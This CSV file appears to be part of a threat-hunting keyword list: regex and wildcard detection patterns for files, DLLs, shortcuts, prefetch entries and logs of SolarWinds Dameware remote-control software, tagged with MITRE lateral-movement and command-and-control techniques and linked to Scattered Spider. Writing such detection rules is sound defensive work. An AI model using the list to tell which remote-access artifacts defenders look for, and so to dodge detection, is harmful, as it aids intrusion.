"*\DWSGRWRP.dll*",".{0,1000}\\DWSGRWRP\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWUtil.dll*",".{0,1000}\\DWUtil\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DWWFDS.dll*",".{0,1000}\\DWWFDS\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\enable dameware remote everywhere agent.lnk*",".{0,1000}\\enable\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\eventlog\application\dameware *",".{0,1000}\\eventlog\\application\\dameware\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\getsupportservice_common_dameware*",".{0,1000}\\getsupportservice_common_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\getsupportservice_dameware*",".{0,1000}\\getsupportservice_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\getsupportservice_dameware\*",".{0,1000}\\getsupportservice_dameware\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\linuxconsole_dw (1).zip*",".{0,1000}\\linuxconsole_dw\s\(1\)\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\logs\baseclient_*.log*",".{0,1000}\\logs\\baseclient_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\logs\baseconsoleapp_*.log*",".{0,1000}\\logs\\baseconsoleapp_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\logs\basupclphlp_*.log*",".{0,1000}\\logs\\basupclphlp_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Logs\DNTU.log*",".{0,1000}\\Logs\\DNTU\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Client Agent MSI Builder.lnk*",".{0,1000}\\Mini\sRemote\sControl\sClient\sAgent\sMSI\sBuilder\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Diagnostics.lnk*",".{0,1000}\\Mini\sRemote\sControl\sDiagnostics\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Help.lnk*",".{0,1000}\\Mini\sRemote\sControl\sHelp\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Log Adjuster.lnk*",".{0,1000}\\Mini\sRemote\sControl\sLog\sAdjuster\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Service*",".{0,1000}\\Mini\sRemote\sControl\sService.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control Service\Settings\SFT: Upload Folder*",".{0,1000}\\Mini\sRemote\sControl\sService\\Settings\\SFT\:\sUpload\sFolder.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Mini Remote Control.lnk*",".{0,1000}\\Mini\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\MRC_12.0_Bootstrap_Install_Log.txt*",".{0,1000}\\MRC_12\.0_Bootstrap_Install_Log\.txt.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\MRCCv2.db*",".{0,1000}\\MRCCv2\.db.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\mspacredentialprovider_*_dameware.dll*",".{0,1000}\\mspacredentialprovider_.{0,1000}_dameware\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\msparegedithelper_*",".{0,1000}\\msparegedithelper_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\mspxtshlpsrv_*",".{0,1000}\\mspxtshlpsrv_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\mspxwebcom.dll*",".{0,1000}\\mspxwebcom\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\multiplicar negocios\beanywhere support express*",".{0,1000}\\multiplicar\snegocios\\beanywhere\ssupport\sexpress.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\baconsoleapp.exe*",".{0,1000}\\prefetch\\baconsoleapp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\baseclient.exe*",".{0,1000}\\prefetch\\baseclient\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupclphlp.exe*",".{0,1000}\\prefetch\\basupclphlp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupregedithlpr.exe*",".{0,1000}\\prefetch\\basupregedithlpr\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupsrvc.exe*",".{0,1000}\\prefetch\\basupsrvc\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupsrvccnfg.exe*",".{0,1000}\\prefetch\\basupsrvccnfg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupsrvcupdater.exe*",".{0,1000}\\prefetch\\basupsrvcupdater\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basupsysinf.exe*",".{0,1000}\\prefetch\\basupsysinf\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\basuptshelper.exe*",".{0,1000}\\prefetch\\basuptshelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\damewareagent.exe*",".{0,1000}\\prefetch\\damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\damewareremoteeverywhereconso*",".{0,1000}\\prefetch\\damewareremoteeverywhereconso.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\tcrmtshellagent.exe*",".{0,1000}\\prefetch\\tcrmtshellagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\tcrmtshellviewer.exe*",".{0,1000}\\prefetch\\tcrmtshellviewer\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\prefetch\tkcuploader.exe*",".{0,1000}\\prefetch\\tkcuploader\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\progra~2\damewa~1\remoteshell\*",".{0,1000}\\progra\~2\\damewa\~1\\remoteshell\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\quick launch\dameware remote everywhere tech console.lnk*",".{0,1000}\\quick\slaunch\\dameware\sremote\severywhere\stech\sconsole\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Service Install Overwrite Remote CFG*",".{0,1000}\\Service\sInstall\sOverwrite\sRemote\sCFG.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SFT: Enable Simple File Transfer*",".{0,1000}\\SFT\:\sEnable\sSimple\sFile\sTransfer.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.DepInjectedClassWalker.dll*",".{0,1000}\\SolarWinds\.DepInjectedClassWalker\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.Contract.dll*",".{0,1000}\\SolarWinds\.Diags\.Contract\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.DameWare.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.DameWare\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.exe*",".{0,1000}\\SolarWinds\.Diags\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.exe.config*",".{0,1000}\\SolarWinds\.Diags\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.Extensions.Common.dll*",".{0,1000}\\SolarWinds\.Diags\.Extensions\.Common\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.Platform.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.Platform\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Diags.Strings.dll*",".{0,1000}\\SolarWinds\.Diags\.Strings\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SOLARWINDS.DRS.LICENSOR.EXE-*",".{0,1000}\\SOLARWINDS\.DRS\.LICENSOR\.EXE\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.LicenseManager.msi*",".{0,1000}\\SolarWinds\.LicenseManager\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.Gen4.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.Gen4.dll.config*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.dll\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.Gen4.Resources.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.Resources\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.Gen4.UI.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.UI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.MRC.COMWrapper.dll*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.MRC.COMWrapper.dll.config*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.dll\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Licensing.MRC.COMWrapper.tlb*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.tlb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Logging.dll*",".{0,1000}\\SolarWinds\.Logging\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.MRC.Licensor.exe*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.MRC.Licensor.exe*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.MRC.Licensor.exe.config*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.MRC.Licensor.log*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Pluggability.Contract.dll*",".{0,1000}\\SolarWinds\.Pluggability\.Contract\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds.Pluggability.dll*",".{0,1000}\\SolarWinds\.Pluggability\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds\Dameware Mini Remote Control*",".{0,1000}\\SolarWinds\\Dameware\sMini\sRemote\sControl.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SolarWinds\Logs\Dameware*",".{0,1000}\\SolarWinds\\Logs\\Dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\SOLARWINDS-DAMEWARE-DRS-ST.EX-*",".{0,1000}\\SOLARWINDS\-DAMEWARE\-DRS\-ST\.EX\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
